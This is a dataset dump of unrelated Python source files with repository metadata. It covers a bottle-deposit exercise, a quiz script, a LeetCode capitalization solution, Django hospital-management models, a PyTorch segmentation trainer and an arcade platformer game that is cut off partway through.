815daa7a085d07da2383291fdfe140fe3de24d40 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex005.py | 0a2cd702fe7a62a4875fa2674961e86c12ac5580 | [] | no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 342 | py | # Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
lessThan1 = int(input("Less than 1 L: "))
moreThan1 = int(input("More than 1 L: "))
refund = (0.1 * lessThan1) + (0.25 * moreThan1)
print("Refund: $" + str(refund))
if __name__ == "__main__": main() | [
"[email protected]"
] | |
8a4708add6cdfe447fdcca3cdccadf54add34fad | 220f1e6f1bd604b0ce452d2337669ad72ef7c11e | /quiz.py | a002fa0a884bdd8c7e27d8c73631451a5e2cfbde | [] | no_license | bikashlama541/RoomA | 9545fa75cf0f02ef4022b692de366423b27d906d | a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1 | refs/heads/master | 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 | Python | UTF-8 | Python | false | false | 547 | py | class Question:
def __init__(self, prompt, answer):
self.prompt = prompt
self.answer = answer
questions_prompts = [
"What colors are apple?\n (a) Red/Green\n (b) Orange",
"What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "b"),
]
def run_quiz(questions):
score = 0
for question in questions:
answer = inputer(question.prompt)
if answer == question.answer:
score +=1
print("You got", score, "out of", len(questions))
run_quiz(questions)
| [
"[email protected]"
] | |
4cce4300cd93c522062d17864b7d7b6579a90919 | eaeb685d13ef6c58364c5497c911f3e2f8c49a43 | /Solution/520_Detect_Capital.py | 72853824378aa294f92113350b1c6fc2394d75c7 | [] | no_license | raririn/LeetCodePractice | 8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64 | 48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03 | refs/heads/master | 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper() or word.islower():
return True
elif word[1:].islower() and wprd[0].isupper():
return True
else:
return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
''' | [
"[email protected]"
] | |
8451258e50d96e33c60b41669ed2db703480788c | c5e4a9a66f686de6eaca331f1ee3823ac925101b | /apps/management/models.py | 56efc0b62de24b22ffdb241452489a41abeab41d | [] | no_license | Tiilon/Hospital_project | b1409be60f0d6daecb0e294bfbe81698d97b7c1f | 6506218f4ad504f9031482999d9b33c92b350df8 | refs/heads/main | 2023-01-23T13:30:11.564836 | 2020-11-24T16:15:12 | 2020-11-24T16:15:12 | 303,461,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,585 | py | from random import randrange
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class Ward(models.Model):
label = models.CharField(max_length=100, blank=True, null=True)
incharge = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='ward_incharge', blank=True, null=True)
beds= models.ManyToManyField('Bed', related_name='ward_beds', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='wards', blank=True, null=True)
patients= models.ManyToManyField('Patient', related_name='ward_patients', blank=True)
def __str__(self):
return self.label
class meta:
db_table= 'ward'
BED_STATUS = {
('Assigned', 'Assigned'),
('Unassigned', 'Unassigned')
}
class Bed(models.Model):
number = models.CharField(max_length=200, blank=True, null=True)
ward = models.ForeignKey(Ward, on_delete=models.SET_NULL, related_name='bed_ward',blank=True, null=True)
status = models.CharField(max_length=200,blank=True, null=True, choices=BED_STATUS)
allocate = models.ForeignKey('BedAllocate', on_delete=models.SET_NULL, related_name='bed_allocate', blank=True, null=True)
bed_allocates = models.ManyToManyField('BedAllocate', related_name='bed_bed_allocate', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='beds', blank=True, null=True)
def __str__(self):
return self.number
class Meta:
db_table = 'bed'
ordering = ('number',)
class BedAllocate(models.Model):
bed = models.ForeignKey(Bed, related_name='bed_allocate_bed', blank='True', null=True, on_delete=models.SET_NULL)
patient = models.ForeignKey('Patient', related_name='bed_allocate_patient', null=True, blank=True, on_delete=models.SET_NULL)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='bed_allocates', blank=True, null=True)
def __str__(self):
return f"{self.bed} - {self.patient}"
class Meta:
db_table = 'bed_allocate'
def generate():
FROM = '0123456789'
LENGTH = 10
pat_id = ""
for i in range(LENGTH):
pat_id += FROM[randrange(0, len(FROM))]
return f"PT{pat_id}/{timezone.now().year}"
GENDER = {
('Male', 'Male'),
('Female', 'Female'),
}
PATIENT_TYPE = {
('OPD', 'OPD'),
('Ward', 'Ward'),
('ER', 'EMERGENCY'),
('DISCHARGED', 'DISCHARGED')
}
MARITAL = {
('Married', 'Married'),
('Single', 'Single'),
('Divorced', 'Divorced'),
('Widowed', 'Widowed'),
}
class VitalSign(models.Model):
patient = models.ForeignKey('Patient', on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_sign_patient')
time = models.TimeField(default=timezone.now)
weight = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
diastolic = models.IntegerField( blank=True, null=True)
pulse = models.IntegerField(blank=True, null=True)
systolic = models.IntegerField( blank=True, null=True)
respiration = models.IntegerField( blank=True, null=True)
temperature = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_signs')
class Meta:
db_table = 'vital_sign'
ordering = ('-time',)
def __str__(self):
return f"{self.patient.full_name()}-{self.time}"
class Patient(models.Model):
patient_id = models.CharField(default=generate, unique=True, editable=False, max_length=100)
first_name = models.CharField(max_length=100, blank=True, null=True)
last_name = models.CharField(max_length=100, blank=True, null=True)
patient_type = models.CharField(max_length=100, blank=True, null=True, choices=PATIENT_TYPE)
gender = models.CharField(max_length=100, blank=True, null=True, choices=GENDER)
marital_status = models.CharField(max_length=100,blank=True,null=True,choices=MARITAL)
date_of_birth = models.DateField(blank=True, null=True)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
bed = models.ForeignKey(Bed, on_delete=models.SET_NULL, related_name='patient_bed', blank=True, null=True)
vital_signs = models.ManyToManyField(VitalSign, related_name='patient_vital_signs', blank=True)
discharged_at = models.DateTimeField(blank=True, null=True)
diagnoses = models.ManyToManyField('MedicalDiagnosis', related_name='patient_diagnosis', blank=True)
notes = models.ManyToManyField('department.Note', related_name='patient_notes', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='patients', blank=True, null=True)
def __str__(self):
return self.patient_id
def full_name(self):
return f"{self.first_name} {self.last_name}"
class Meta:
db_table = 'patient'
class MedicalDiagnosis(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='diagnosis_patient', blank=True, null=True)
complaints = models.CharField(max_length=1000, blank=True, null=True)
symptoms = models.CharField(max_length=2000, blank=True, null=True)
diagnosis = models.CharField(max_length=100,blank=True, null=True)
is_admitted = models.BooleanField(blank=True,null=True)
onset = models.CharField(max_length=100, blank=True, null=True)
treatments = models.ManyToManyField('Treatment', related_name='diagnosis_treatments', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='diagnosis', blank=True, null=True)
def __str__(self):
return self.diagnosis
class Meta:
db_table= 'medical diagnosis'
ordering = ('-created_at',)
TREATMENT_STATUS = {
('Pending', 'Pending'),
('Canceled','Canceled'),
('Completed', 'Completed'),
}
class Treatment(models.Model):
diagnosis = models.ForeignKey(MedicalDiagnosis, on_delete=models.SET_NULL, related_name='treatment_diagnosis', blank='null', null=True)
treatment = models.CharField(max_length=2000, blank=True, null=True)
prescription = models.CharField(max_length=2000, blank=True,null=True)
pharmacy_prescription = models.ForeignKey('pharmacy.Prescription', on_delete= models.SET_NULL, related_name='treatment_prescription', blank=True, null=True)
status = models.CharField(max_length=100,blank=True,null=True, choices= TREATMENT_STATUS)
time_treated = models.TimeField(blank=True, null=True)
date_treated= models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='treatments',blank=True, null=True)
def __str__(self):
return str(self.treatment) + ' - ' + str(self.prescription)
class Meta:
db_table = 'treatment'
ordering = ('-created_at',)
COMPLAINTS_STATUS = {
('Pending', 'Pending'),
('Resolved', 'Resolved'),
('Canceled', 'Canceled'),
}
class Complaints(models.Model):
complaints = models.TextField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaints', blank=False, null=True)
review = models.CharField(max_length=3000, blank=True, null=True)
is_seen = models.BooleanField(blank=True, null=True, default=False)
seen_at = models.DateTimeField(blank=True, null=True)
seen_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_seen', blank=False, null=True)
status = models.CharField(max_length=200, blank=True, null=True, choices=COMPLAINTS_STATUS)
review_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_review',blank=False, null=True)
review_at = models.DateTimeField(blank=True, null=True)
class Meta:
ordering = ('-created_at',)
db_table = 'complaint'
def __str__(self):
return str(self.complaints)
DEPARTMENTS ={
('Ward', 'Ward'),
('Pharmacy', 'Pharmacy'),
('Account', 'Account'),
('Management', 'Management'),
('HR', 'Human Resource')
}
REQUEST_STATUS = {
(0, 'Pending'),
(1, 'Accepted'),
(2, 'Rejected')
}
class Request(models.Model):
department = models.CharField(max_length=200, blank=True, null=True, choices=DEPARTMENTS)
description = models.TextField(max_length=5000, blank=True, null=True)
status = models.IntegerField(blank=True, null= True, choices=REQUEST_STATUS)
comments = models.CharField(max_length=1000, blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='requests', blank=True, null=True)
def __str__(self):
return str(self.department)
class Meta:
db_table = 'request'
class Expenditure(models.Model):
category = models.CharField(max_length=100, blank=True, null=True)
item = models.CharField(max_length=300, blank=True, null=True)
total_cost = models.DecimalField(max_digits=10, blank=True, null=True, decimal_places=2)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='expenditures', blank=True, null=True)
def __str__(self):
return f"{self.category} - {self.total_cost}"
class Meta:
db_table = 'expenditure'
class LeavePeriod(models.Model):
start_date = models.DateField(blank=True, null=True)
end_date = models.DateField(blank=True, null=True)
num_of_days = models.IntegerField(default=0)
days_allowed = models.IntegerField(default=0)
staffs = models.ManyToManyField('staff.Staff', related_name='staff', blank='null')
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='leave_periods', blank=True, null=True)
def __str__(self):
return f"{self.start_date}-{self.end_date}"
class Meta:
db_table = 'leave_period'
STREAMS = {
('Government', 'Government'),
('Patient', 'Patient'),
('Donation', 'Donation')
}
class Revenue(models.Model):
stream = models.CharField(max_length=200, blank=True, null=True, choices=STREAMS)
bill = models.ForeignKey('portal.Bill', related_name='revenue_bill', on_delete=models.SET_NULL, blank=True, null=True)
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='revenue_patient', blank=True, null=True)
description = models.CharField(max_length=100, blank=True, null=True)
amount = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(blank=True, null=True)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='revenues')
def __str__(self):
return str(self.stream)
class Meta:
db_table = 'revenue'
ordering = ('-created_at',)
A_STATUS = {
('Show', 'Show'),
('Hide', 'Hide')
}
# class Announcement(models.Model):
# message = models.CharField(max_length=200, blank=True, null=True)
# title = models.CharField(max_length=200, blank=True, null=True)
# status = models.CharField(max_length=200, blank=True, null=True, choices=A_STATUS) | [
"[email protected]"
] | |
268df992d4a58fa7d9720b5e331578c2652054a2 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_segmentation/NAS-SEGM_ID1142_for_PyTorch/src/engine/trainer.py | 6e598066959d4fb2592982d4218e84c0c4d156e0 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,811 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
"""Training functions"""
import time
import logging
from collections import defaultdict
import numpy as np
import torch
from torch import nn
from helpers.utils import AverageMeter, try_except
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
logger = logging.getLogger(__name__)
@try_except
def populate_task0(segmenter, train_loader, kd_net, n_train, do_kd=False):
"""Populate data for task0 - the outputs of encoder.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
kd_net (nn.Module) : teacher network if any
n_train (int) : how many samples to pre-compute
do_kd (boolean) : whether to do knowledge distillation
"""
Xy_train = defaultdict(list)
segmenter.eval()
# Populate Xy_train with encoder's outputs
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train")
train_loader.batch_sampler.batch_size = 1 # to not run out of memory
with torch.no_grad():
n_curr = 0
for sample in train_loader:
image = sample["image"].float().npu()
target = sample["mask"].float()
enc_outputs = segmenter.module.encoder(image)
for i, enc_output in enumerate(enc_outputs):
Xy_train[i].extend(enc_output.unbind(0))
Xy_train["y"].extend(
nn.functional.interpolate(
target[:, None], size=enc_outputs[0].size()[2:], mode="nearest"
)
.long()
.squeeze(dim=1)
.npu()
.unbind(0)
)
if do_kd:
kd_y = kd_net(image)
Xy_train["kd_y"].extend(
nn.functional.interpolate(
kd_y,
size=enc_outputs[0].size()[2:],
mode="bilinear",
align_corners=False,
).unbind(0)
)
n_curr += image.size(0)
if n_curr >= n_train:
# By default we are taking the size of the first encoder output
# as our output size
Xy_train["out_size"] = enc_outputs[0].size()[2:]
logger.info(" Populated Xy_train, N = {}".format(n_curr))
break
# concat into a single tensor
for k, v in Xy_train.items():
if k != "out_size":
Xy_train[k] = torch.stack(v)
return Xy_train
@try_except
def train_task0(
Xy_train,
segmenter,
optim_dec,
epoch,
segm_crit,
kd_crit,
batch_size,
freeze_bn,
do_kd,
kd_coeff,
dec_grad_clip,
do_polyak,
avg_param=None,
polyak_decay=0.9,
aux_weight=0,
):
"""Training task0 segmenter - only decoder
Args:
Xy_train (dict) : pre-computed data
segmenter (nn.Module) : segmentation network
optim_dec (optim) : optimiser for decoder
epoch (int) : current segm epoch
segm_crit (nn.Loss) : segmentation criterion
kd_crit (nn.Loss) : knowledge distillation criterion
batch_size (int) : batch size used for training
freeze_bn (bool) : whether to keep batch norm statistics intact
do_kd (bool) : whether to do knowledge distillation
kd_coeff (float) : loss coefficient for knowledge distillation
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
aux_weight (float) : loss coefficient for auxiliary outputs
"""
# Train
n_examples = Xy_train[0].size(0)
batch_size = min(batch_size, n_examples)
n_passes = n_examples // batch_size
indices = np.arange(n_examples)
batch_time = AverageMeter()
losses = AverageMeter()
# Update BNs if not set otherwise
segmenter.module.decoder.train()
if freeze_bn:
for m in segmenter.module.decoder.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
np.random.shuffle(indices)
n=0
for i in range(n_passes):
if n==1:
pass
n=n+1
start = time.time()
train_idx = indices[(i * batch_size) : (i + 1) * batch_size]
encoder_outputs = [
Xy_train[key][train_idx]
for key in Xy_train.keys()
if key not in ["y", "kd_y", "out_size"]
]
output = segmenter.module.decoder(encoder_outputs)
if isinstance(output, tuple):
output, aux_outs = output
# NOTE: Output size can change as some layers will not be connected
output = nn.functional.interpolate(
output, size=Xy_train["out_size"], mode="bilinear"
)
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, Xy_train["y"][train_idx])
if do_kd:
kd_loss = kd_crit(output, Xy_train["kd_y"][train_idx])
loss += kd_coeff * kd_loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=Xy_train["out_size"], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, Xy_train["y"][train_idx]) * aux_weight
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
nn.utils.clip_grad_norm_(segmenter.module.decoder.parameters(), dec_grad_clip)
optim_dec.step()
losses.update(loss.item())
batch_time.update(time.time() - start)
if do_polyak:
for p, avg_p in zip(segmenter.module.decoder.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
logger.info(
" Train epoch: {}\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(epoch, losses.avg, batch_time.avg)
)
@try_except
def train_segmenter(
segmenter,
train_loader,
optim_enc,
optim_dec,
epoch,
segm_crit,
freeze_bn,
enc_grad_clip,
dec_grad_clip,
do_polyak,
print_every=10,
aux_weight=-1,
avg_param=None,
polyak_decay=0.99,
):
"""Training segmenter end-to-end.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
optim_enc (optim) : optimiser for encoder
optim_dec (optim) : optimiser for decoder
epoch (int) : current segmenter epoch
segm_crit (nn.Loss) : segmentation criterion
freeze_bn (bool) : whether to keep batch norm statistics intact
enc_grad_clip (float) : clip encoder's parameters' norm to this value
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
print_every (int) : how often to print out information
aux_weight (float) : loss coefficient for auxiliary outputs
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
"""
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train") # for subset
segmenter.train()
if freeze_bn:
for m in segmenter.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
batch_time = AverageMeter()
losses = AverageMeter()
m=0
for i, sample in enumerate(train_loader):
if m==0:
pass
m=m+1
start = time.time()
image = sample["image"].float().npu()
target = sample["mask"].npu()
target_var = torch.autograd.Variable(target).float()
# Compute output
output = segmenter(image)
if isinstance(output, tuple):
output, aux_outs = output
target_var = nn.functional.interpolate(
target_var[:, None], size=output.size()[2:], mode="nearest"
).long()[:, 0]
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, target_var)
# Compute auxiliary loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=target_var.size()[1:], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, target_var) * aux_weight
optim_enc.zero_grad()
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
if enc_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.encoder.parameters(), enc_grad_clip
)
if dec_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.decoder.parameters(), dec_grad_clip
)
optim_enc.step()
optim_dec.step()
if do_polyak:
for p, avg_p in zip(segmenter.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
losses.update(loss.item())
batch_time.update(time.time() - start)
bt=time.time() - start
if i % print_every == 0:
logger.info(
" Train epoch: {} [{}/{}]\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(
epoch, i, len(train_loader), losses.avg, bt
)
)
| [
"[email protected]"
] | |
639eb6874b95a9e96a37069b983815ce6ac2bc13 | 227c102ed508ad2b1d046340dcb598a7b16e2925 | /.history/Forritun/Verkefni með einkunn/Lokaverkefni/lokaverkefni_20201208144514.py | abaca0b10d37452fa155d2847cc3949d691d5db1 | [] | no_license | larusarmann/Skoli-haust-2020 | 298e48f1c20d7ec0c92124018650253f13bcbb2f | 3061a0238b74919daccaa74117bc1c32b3436619 | refs/heads/master | 2023-02-07T09:15:45.493928 | 2020-12-09T19:46:53 | 2020-12-09T19:46:53 | 292,543,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,104 | py | """
Show how to do enemies in a platformer
Artwork from: http://kenney.nl
Tiled available from: http://www.mapeditor.org/
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_enemies_in_platformer
"""
import random
import arcade
import os
SPRITE_SCALING_coin=12
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Lárus"
VIEWPORT_MARGIN = 40
RIGHT_MARGIN = 150
MOVEMENT_SPEED = 5
JUMP_SPEED = 14
GRAVITY = 0.5
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self):
"""
Initializer
"""
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, "Lokaverkefni Lárus")
# Sprite lists
self.coin_list = None
self.player_list = None
self.wall_list = None
self.flag=True
self.score = 0
# Set up the player
self.player_sprite = None
# This variable holds our simple "physics engine"
self.physics_engine = None
# Manage the view port
self.view_left = 0
self.view_bottom = 0
def setup(self):
""" Set up the game and initialize the variables. """
self.wall_list = arcade.SpriteList()
self.enemy_list = arcade.SpriteList()
self.player_list = arcade.SpriteList()
self.coin_list = arcade.SpriteList()
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = 0
wall.left = x
self.wall_list.append(wall)
# Draw the platform
for x in range(SPRITE_SIZE * 3, SPRITE_SIZE * 8, SPRITE_SIZE):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE * 3
wall.left = x
self.wall_list.append(wall)
# Draw the crates
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE * 5):
wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/boxCrate_double.png", SPRITE_SCALING)
wall.bottom = SPRITE_SIZE
wall.left = x
self.wall_list.append(wall)
for i in range(7):
# Create the coin instance
coin = arcade.Sprite("C:\Git\Skoli-haust-2020\Forritun\Verkefni með einkunn\Lokaverkefni\images\coinGold.png", SPRITE_SCALING / 2)
# Position the coin
coin.center_x = random.randrange(SCREEN_WIDTH)
coin.center_y = random.randrange(600)
# Add the coin to the lists
self.coin_list.append(coin)
# -- Draw an enemy on the ground
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE
enemy.left = SPRITE_SIZE * 2
# Set enemy initial speed
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Draw a enemy on the platform
enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
enemy.bottom = SPRITE_SIZE * 4
enemy.left = SPRITE_SIZE * 4
# Set boundaries on the left/right the enemy can't cross
enemy.boundary_right = SPRITE_SIZE * 8
enemy.boundary_left = SPRITE_SIZE * 3
enemy.change_x = 2
self.enemy_list.append(enemy)
# -- Set up the player
self.player_sprite = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character1.png", SPRITE_SCALING)
self.player_list.append(self.player_sprite)
# Starting position of the player
self.player_sprite.center_x = 64
self.player_sprite.center_y = 270
self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,
self.wall_list,
gravity_constant=GRAVITY)
# Set the background color
arcade.set_background_color(arcade.color.AMAZON)
def on_draw(self):
arcade.start_render()
if self.flag:
arcade.set_background_color(arcade.color.BLUE)
arcade.draw_text("Lárus Ármann Kjartansson\n Náðu fimm peningum til að vinna leikin \n Ýttu á Q til að hefja leik", 10,300, arcade.color.WHITE, 24)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
elif self.score >=5 and self.flag==False:
arcade.set_background_color(arcade.color.BUBBLES)
arcade.draw_text("Leik lokið ",self.view_left+200,self.view_bottom+300, arcade.color.CHERRY, 44)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
else:
arcade.set_background_color(arcade.color.AMAZON)
self.wall_list.draw()
self.player_list.draw()
arcade.draw_text(f"stig: {self.score}", self.player_sprite.center_x-15,self.player_sprite.center_y+30, arcade.color.WHITE, 14)
arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
self.coin_list.draw()
def draw_game(self):
"""
Draw all the sprites, along with the score.
"""
# Draw all the sprites.
self.player_list.draw()
self.coin_list.draw()
# Put the text on the screen.
output = f"Score: {self.score}"
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
def on_key_press(self, key, modifiers):
"""
Called whenever the mouse moves.
"""
if key == arcade.key.Q:
self.flag=False
else:
if key == arcade.key.UP:
if self.physics_engine.can_jump():
self.player_sprite.change_y = JUMP_SPEED
elif key == arcade.key.LEFT:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.RIGHT:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""
